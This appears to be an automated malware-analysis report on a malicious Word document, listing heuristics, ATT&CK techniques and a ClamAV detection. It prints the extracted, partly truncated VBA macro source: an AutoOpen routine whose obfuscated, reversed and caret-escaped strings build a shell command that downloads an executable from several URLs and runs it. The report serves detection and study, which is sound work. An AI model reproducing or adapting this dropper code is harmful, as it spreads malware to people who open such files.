MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro that executes upon opening. The macro attempts to run a command using the Shell function, indicating it's likely a downloader or dropper for a second-stage payload. The presence of an AutoOpen macro and the ClamAV detection strongly suggest malicious intent.
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6691365-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6691365-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5346 bytes |
SHA-256: 32ec8384d40434e9904ab7dc60c70b616fb17c6c89c633d551807ecce7fb1b41 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hPzsJuT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const WfiZL = 0
Dim KGSUq(4)
KGSUq(0) = Left(FTNZriv, 700)
KGSUq(1) = MidB(WwHsh, 341, 527)
KGSUq(2) = Right(LljAjaGd, 363)
KGSUq(3) = Mid(ZWJVph, 252, 407)
Dim AWBJJv(3)
AWBJJv(0) = Mid(ZWJVph, 252, 407)
AWBJJv(1) = Left(FTNZriv, 700)
AWBJJv(2) = Right(LljAjaGd, 363)
Dim XRKrD(2)
XRKrD(0) = Right(LljAjaGd, 363)
XRKrD(1) = Left(FTNZriv, 700)
Dim uEzVY(3)
uEzVY(0) = MidB(WwHsh, 341, 527)
uEzVY(1) = MidB(WwHsh, 341, 527)
uEzVY(2) = Right(LljAjaGd, 363)
Dim njASr(3)
njASr(0) = Left(FTNZriv, 700)
njASr(1) = Right(LljAjaGd, 363)
njASr(2) = MidB(WwHsh, 341, 527)
Dim zMGifZ(2)
zMGifZ(0) = Right(LljAjaGd, 363)
zMGifZ(1) = Right(LljAjaGd, 363)
Dim TaEzL(4)
TaEzL(0) = Mid(ZWJVph, 252, 407)
TaEzL(1) = Right(LljAjaGd, 363)
TaEzL(2) = Right(LljAjaGd, 363)
TaEzL(3) = Mid(ZWJVph, 252, 407)
Shell@ GNwIZLkXw + UMhwfkq + HHrQwrlB, CInt(WfiZL)
Dim wDMfE(3)
wDMfE(0) = Mid(ZWJVph, 252, 407)
wDMfE(1) = Left(FTNZriv, 700)
wDMfE(2) = Left(FTNZriv, 700)
Dim kldDF(2)
kldDF(0) = Left(FTNZriv, 700)
kldDF(1) = Mid(ZWJVph, 252, 407)
Dim pvUVrF(3)
pvUVrF(0) = Mid(ZWJVph, 252, 407)
pvUVrF(1) = Left(FTNZriv, 700)
pvUVrF(2) = Left(FTNZriv, 700)
End Sub
Attribute VB_Name = "bZYRFpwMMU"
Function GNwIZLkXw()
Dim YVrhs(5)
YVrhs(0) = Left(FTNZriv, 700)
YVrhs(1) = Left(FTNZriv, 700)
YVrhs(2) = Left(FTNZriv, 700)
YVrhs(3) = Right(LljAjaGd, 363)
YVrhs(4) = Mid(ZWJVph, 252, 407)
Dim zGVbZ(5)
zGVbZ(0) = MidB(WwHsh, 341, 527)
zGVbZ(1) = Right(LljAjaGd, 363)
zGVbZ(2) = Left(FTNZriv, 700)
zGVbZ(3) = Mid(ZWJVph, 252, 407)
zGVbZ(4) = MidB(WwHsh, 341, 527)
YiLoobQ = Format(Chr(0 + 5 + 15 + 4 + 75)) + "md /V/" + Format(Chr(0 + 4 + 10 + 3 + 50)) + Format(Chr(0 + 1 + 4 + 1 + 28)) + "^s^et 1^F" + "= ^ ^ ^ ^ ^ ^" + " ^ ^ ^ }}{h" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^ta" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^}^;kaerb;j" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^o^$ ^m^" + "et^I-ekovn^I^;)" + "j" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "o$ ,n^h^d^$(el^iF" + "^dao^lnw^o" + "^D.K^Pp"
Dim wUALz(3)
wUALz(0) = Right(LljAjaGd, 363)
wUALz(1) = MidB(WwHsh, 341, 527)
wUALz(2) = Mid(ZWJVph, 252, 407)
Dim iHLrFz(2)
iHLrFz(0) = MidB(WwHsh, 341, 527)
iHLrFz(1) = Mid(ZWJVph, 252, 407)
Dim DYBss(2)
DYBss(0) = MidB(WwHsh, 341, 527)
DYBss(1) = Left(FTNZriv, 700)
Dim uwGwrD(5)
uwGwrD(0) = Left(FTNZriv, 700)
uwGwrD(1) = Right(LljAjaGd, 363)
uwGwrD(2) = Mid(ZWJVph, 252, 407)
uwGwrD(3) = Mid(ZWJVph, 252, 407)
uwGwrD(4) = MidB(WwHsh, 341, 527)
Dim aHZhf(2)
aHZhf(0) = Right(LljAjaGd, 363)
aHZhf(1) = MidB(WwHsh, 341, 527)
iZjQhiq = "$^{yr^t^{)PzV^$ n^i^ n^h^d$(^h" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^a^erof;^'^e^xe.^'+dL^Z^$+'" + "^\^'+" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "i^l^b^u^p^:vne$=j" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^o$^" + ";^'^48^7' = d^L^" + "Z$;)'@'(^til^p^S^.^'5f/^m" + "^o" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^.o" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "d^dag//^:^" + "p^tt^h^@^QJJ6^p/^m^" + "o" + Format(Chr(0 + 5 + 15 + 4 + 75)) + ".^amo^h^" + "ab//:^p^t^t^h^@Iyt^1/mo" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^.^l^" + "a^i" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "nani^fn"
Dim Rwlav(5)
Rwlav(0) = Right(LljAjaGd, 363)
Rwlav(1) = MidB(WwHsh, 341, 527)
Rwlav(2) = MidB(WwHsh, 341, 527)
Rwlav(3) = Right(LljAjaGd, 363)
Rwlav(4) = Left(FTNZriv, 700)
Dim XEIvZ(2)
XEIvZ(0) = Left(FTNZriv, 700)
XEIvZ(1) = Right(LljAjaGd, 363)
Dim dTFwN(3)
dTFwN(0) = Mid(ZWJVph, 252, 407)
dTFwN(1) = Right(LljAjaGd, 363)
dTFwN(2) = Mid(ZWJVph, 252, 407)
Dim NwQEqu(2)
NwQEqu(0) = Left(FTNZriv, 700)
NwQEqu(1) = Left(FTNZriv, 700)
zCjPwKBZU = "^ergdn^i" + "^l//:ptt^h^@^O/m^o" + Format(Chr(0 + 5 + 15 + 4 + 75)) + ".ev^" + "i^t^a^er" + Format(Chr(0 + 5 + 15 + 4 + 75)) + "^in" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.